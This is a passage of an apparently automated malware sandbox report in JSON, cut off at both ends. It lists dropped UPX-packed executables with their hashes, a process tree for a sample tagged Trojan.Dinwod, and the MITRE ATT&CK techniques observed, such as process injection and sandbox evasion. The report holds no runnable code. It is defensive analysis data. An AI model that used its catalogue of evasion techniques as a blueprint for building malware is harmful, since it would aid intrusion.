"42f65e6efd9457ea8030f941788f21da35eecdd8d5af42fd67ceba7a31cf72f5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tlxll.exe (PID: 3452)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "btpbndn.exe", "file_path": "C:\\btpbndn.exe", "file_size": 342177, "sha256": "30ae38eb0355590583b3f824382abc1be0d17649c5749c9f93542da05cc316b7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xxjrxn.exe (PID: 4380)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "djlfb.exe", "file_path": "C:\\djlfb.exe", "file_size": 342504, "sha256": "d512965c75991d80dd755bd8d13b4431020578213336f01c60a6713ad54c2ab6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nvphdb.exe (PID: 3900)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dtlrb.exe", "file_path": "C:\\dtlrb.exe", "file_size": 342458, "sha256": "13738beaa19b169cd5a75550ea1c263002f7576d50a2e4a895e488d29372c4c8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ldpfr.exe (PID: 2564)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ffjhjxx.exe", "file_path": "C:\\ffjhjxx.exe", "file_size": 342308, "sha256": "05e3466edb082bcaf5f8f660c68317b00dd73232dafb5ee056b631556dd56e03", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ffjhjxx.exe (PID: 6016)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "flrpd.exe", "file_path": "C:\\flrpd.exe", "file_size": 342600, "sha256": "0203871156884b2b35ad6f73bd1107d6722371ed2a91552005f972fdc874ac9d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "flrpd.exe (PID: 4292)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fnjvr.exe", "file_path": "C:\\fnjvr.exe", "file_size": 342825, "sha256": "bbf6dcb1535737968207faf539a6db76c0c843fdc5a464a20f0f2a86aaacd2fc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fnjvr.exe (PID: 3944)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fptjxhr.exe", "file_path": "C:\\fptjxhr.exe", "file_size": 342290, "sha256": "ec4763fb4823de7585ef8b3d2113d3dd1daa53da76cc68ffa143f45f2b525aca", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tbxfnh.exe (PID: 4124)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "frdfrrr.exe", "file_path": "C:\\frdfrrr.exe", "file_size": 342236, "sha256": "4cc57321e813b2f814dfb2a16922d2a69aa7fb33929d4283912e24ede1bc1f00", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "txbxjp.exe (PID: 4372)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fxrlrh.exe", "file_path": "C:\\fxrlrh.exe", "file_size": 342701, "sha256": "ff459369e09a43404b4b87ad3d952afe0b8676bd7e7b69e6e1cecf331035212d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fxrlrh.exe (PID: 3180)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hnvpxj.exe", "file_path": "C:\\hnvpxj.exe", "file_size": 342138, "sha256": "7c0ed0cdab577843bacdee3ed44de2eaddc69f733d0c733fab853c9897d9780a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2680282.exe (PID: 3556)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hrrnrd.exe", "file_path": "C:\\hrrnrd.exe", "file_size": 342150, "sha256": "57802b2cda9feb387869009c2303c8611f606e2fdfaa90dbf2779dd0f8022b34", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hnvpxj.exe (PID: 6032)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jlrnp.exe", "file_path": "C:\\jlrnp.exe", "file_size": 342263, "sha256": "4138c21d71a042a029097dd288990e0ec9d205f555e6a58a142c00e369875e0f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "464448.exe (PID: 3568)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jpflb.exe", "file_path": "C:\\jpflb.exe", "file_size": 342892, "sha256": "ed5d353ebb256ecca976f57cb7acf84c589751dfa33efbb572d906381d9aae96", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "02242.exe (PID: 3976)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jrfndd.exe", "file_path": "C:\\jrfndd.exe", "file_size": 342476, "sha256": "10c30ae8d59045a2091dd3e90384cbfda17b519807d40a1ada19e767d5840988", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jrfndd.exe (PID: 2136)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lbjvvjh.exe", "file_path": "C:\\lbjvvjh.exe", "file_size": 342195, "sha256": "75f91bee3f77b206181b141c7200a4dbdd122d0ef7dded280760664b35deb3f1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lbjvvjh.exe (PID: 6128)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ldpfr.exe", "file_path": "C:\\ldpfr.exe", "file_size": 342448, "sha256": "d008f8811291579f8211be934d91e4f0887723992ceb6e57ce73298edcae09ba", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "phdjp.exe (PID: 4040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nffhjx.exe", "file_path": "C:\\nffhjx.exe", "file_size": 342810, "sha256": "ac6d0556f95ec747006364358679ea0897ae16e693b0ca6fa90c28c5102c96e5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "064826.exe (PID: 596)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nrjljrp.exe", "file_path": "C:\\nrjljrp.exe", "file_size": 342714, "sha256": "de1c346b59e464d298153c5bddb437301d9f094cd379a3263270878090394395", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fxrlrh.exe (PID: 3180)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nvphdb.exe", "file_path": "C:\\nvphdb.exe", "file_size": 342490, "sha256": "dce42dbdc21cfa175ad2ef72c2a1e05992e685e10d842fdb2f20b3ff73694bf4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nvphdb.exe (PID: 3900)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pdhfl.exe", "file_path": "C:\\pdhfl.exe", "file_size": 342635, "sha256": "fbf1f3d94d6698005507f351c7d9ab3fd0d152f443849af818161978b0978a2b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pdhfl.exe (PID: 4172)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pdvxbf.exe", "file_path": "C:\\pdvxbf.exe", "file_size": 342213, "sha256": "944afe0c21b3fb4e646af80e314a0570064b505e2e4e11e351128a17e2a8538e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pdvxbf.exe (PID: 6080)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "phdjp.exe", "file_path": "C:\\phdjp.exe", "file_size": 342434, "sha256": "3600b2a00f6773bc39945f7d3b624890d23f352ff5902577082d1fc5361288ec", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "phdjp.exe (PID: 4040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pjjdj.exe", "file_path": "C:\\pjjdj.exe", "file_size": 342732, "sha256": "056ebd77e2ec589df0f68f59bb68fd82f724e93e8d4cc2a6afe1777dd4c5654f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pjjdj.exe (PID: 3580)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pjjvtd.exe", "file_path": "C:\\pjjvtd.exe", "file_size": 342617, "sha256": "a84deb5f85010192f9d926edb0ae2fa0bfb49ed7e379062f044297a432f719c4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "flrpd.exe (PID: 4292)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rflrbrt.exe", "file_path": "C:\\rflrbrt.exe", "file_size": 342682, "sha256": "1e9607e99644e1b6f895dcb76149bf81e4a567cf14d07f4dc748c8a5133b6dfc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rflrbrt.exe (PID: 3188)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tbnhh.exe", "file_path": "C:\\tbnhh.exe", "file_size": 342934, "sha256": "f6b21188110a087b4606b549594f943287a0bcd5dcbf4bd06e7977e5752b84a2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tbnhh.exe (PID: 1448)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tbxfnh.exe", "file_path": "C:\\tbxfnh.exe", "file_size": 342277, "sha256": "27a88ed26a5c98eb673e2b2b92e9bf20716c0194acc2753fbdcb025cfcb27d9b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tbxfnh.exe (PID: 4124)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tlxll.exe", "file_path": "C:\\tlxll.exe", "file_size": 342652, "sha256": "b2ee80b26cd92d199e8b860f432b5585c77fadab844362fe22ab89e12249c1ca", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pdhfl.exe (PID: 4172)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "txbxjp.exe", "file_path": "C:\\txbxjp.exe", "file_size": 342224, "sha256": "96171fb3fead80cb0f6416d42437b6ddf2a09d59e3f0a5f48ba986502d35a9a2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "txbxjp.exe (PID: 4372)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xbnxx.exe", "file_path": "C:\\xbnxx.exe", "file_size": 342923, "sha256": "b92baa3190c37625343750aec2a99e0dbd018ee4e260bb48e300138c65dc3d6e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xdhlrl.exe (PID: 3864)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xdhlrl.exe", "file_path": "C:\\xdhlrl.exe", "file_size": 342903, "sha256": "d5d2a72c3df24a607cb45cc891280dd2f7dfa94fe3d8e1155987cca771e6d745", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xdhlrl.exe (PID: 3864)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xxjrxn.exe", "file_path": "C:\\xxjrxn.exe", "file_size": 342167, "sha256": "ce04ec6fae48a9b23579fa25e7bda745ab94050befe087c1f3d767b12aa4a9e4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xxjrxn.exe (PID: 4380)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jvhfn.exe", "file_size": 343286, "sha256": "a5b49a947db7bd588f4d544187428e9188981ed240431c408e2c8cfe7beb81fc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "042468.exe", "file_size": 343267, "sha256": "054affa500ac136e2db67860fef93ca89a67c28a8b6d87156debdaa4ad614cc1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2626426.exe", "file_size": 343250, "sha256": "b91d548ecdd6df7050e4e5b1c5111c531a3471dc9328cf14a306b10ef5a26a82", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8428466.exe", "file_size": 343234, "sha256": "191942dccc7c9bad6a7e8570191fd36d57e67a96b2982a51041ae6abf48d3483", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "npxxxd.exe", "file_size": 343223, "sha256": "7369eb262248e2540d3fe4449021e2c83df7a69d1bca13190318190be6805856", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pffjpht.exe", "file_size": 343203, "sha256": "48b9dbc8aa8e75815b803404154fe48d423ac43abe907df45277db036a2c067c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vjxrx.exe", "file_size": 343189, "sha256": "0fdadcd8506ee385e298d1136b0e52ccae6df3304d83d39cf13c67345f8a71b9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "trnnjf.exe", "file_size": 343177, "sha256": "6176f155e41bad0e5df8114ca57bce41737a078d85285e03e58f9ec4baaf13b3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ttfvnn.exe", "file_size": 343159, "sha256": "7ed715ab0aac936653ab2e60a1358fc797091a35bfe9e131a536bf47228664c1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "240606.exe", "file_size": 343146, "sha256": "ae3d0debdda3ebf90cddd959fb3fa21a3e4f1aaf4fd6accbc270c0ea3aa91791", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6402288.exe", "file_size": 343131, "sha256": "98a45f412c7b6cb5d41d56e58818e7788bfc6bf3262a56ffdd1413c6d18ddde4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bttfvf.exe", "file_size": 343118, "sha256": "8bf0d05c7ae40986a58172f40039d303b2cf9a2a582345f70355e7f30b766f6b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hnjnfnj.exe", "file_size": 343105, "sha256": "5b65a873e578492901c8bab0a72704d2404f1eb0822a7a1e4c5ca96e2d06b2ec", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rjfjrfn.exe", "file_size": 343087, "sha256": "4fa4748430ec2bba0cd75c31f4d8ef765c97cf297bb36c32c100217874abbf99", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jfhhd.exe", "file_size": 343074, "sha256": "24cceaf69c8c0706965cbc8ebe5640e184cb50b35d7a685d678ddd2aebce56d5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00004116", "name": "3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe", "normalized_path": "C:\\3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe", "sha256": "3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084", "av_label": "Trojan.Dinwod", "av_matched": 17, "av_total": 22}, {"uid": "00000000-00003556", "parentuid": "00000000-00004116", "name": "2680282.exe", "normalized_path": "c:\\2680282.exe", "sha256": "933a922ce0f3bae48b56382fd4b7b668ea90fe678ecf649159b6ca2b25c72209"}, {"uid": "00000000-00006032", "parentuid": "00000000-00003556", "name": "hnvpxj.exe", "normalized_path": "c:\\hnvpxj.exe", "sha256": "7c0ed0cdab577843bacdee3ed44de2eaddc69f733d0c733fab853c9897d9780a"}, {"uid": "00000000-00004376", "parentuid": "00000000-00006032", "name": "hrrnrd.exe", "normalized_path": "c:\\hrrnrd.exe", "sha256": "57802b2cda9feb387869009c2303c8611f606e2fdfaa90dbf2779dd0f8022b34"}, {"uid": "00000000-00004380", "parentuid": "00000000-00004376", "name": "xxjrxn.exe", "normalized_path": "c:\\xxjrxn.exe", "sha256": "ce04ec6fae48a9b23579fa25e7bda745ab94050befe087c1f3d767b12aa4a9e4"}, {"uid": "00000000-00004120", "parentuid": "00000000-00004380", "name": "btpbndn.exe", "normalized_path": "c:\\btpbndn.exe", "sha256": "30ae38eb0355590583b3f824382abc1be0d17649c5749c9f93542da05cc316b7"}, {"uid": "00000000-00006128", "parentuid": "00000000-00004120", "name": "lbjvvjh.exe", "normalized_path": "c:\\lbjvvjh.exe", "sha256": "75f91bee3f77b206181b141c7200a4dbdd122d0ef7dded280760664b35deb3f1"}, {"uid": "00000000-00006080", "parentuid": "00000000-00006128", "name": "pdvxbf.exe", "normalized_path": "c:\\pdvxbf.exe", "sha256": "944afe0c21b3fb4e646af80e314a0570064b505e2e4e11e351128a17e2a8538e"}, {"uid": "00000000-00004372", "parentuid": "00000000-00006080", "name": "txbxjp.exe", "normalized_path": "c:\\txbxjp.exe", "sha256": "96171fb3fead80cb0f6416d42437b6ddf2a09d59e3f0a5f48ba986502d35a9a2"}, {"uid": "00000000-00006060", "parentuid": "00000000-00004372", "name": "frdfrrr.exe", "normalized_path": "c:\\frdfrrr.exe", "sha256": "4cc57321e813b2f814dfb2a16922d2a69aa7fb33929d4283912e24ede1bc1f00"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 10}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", 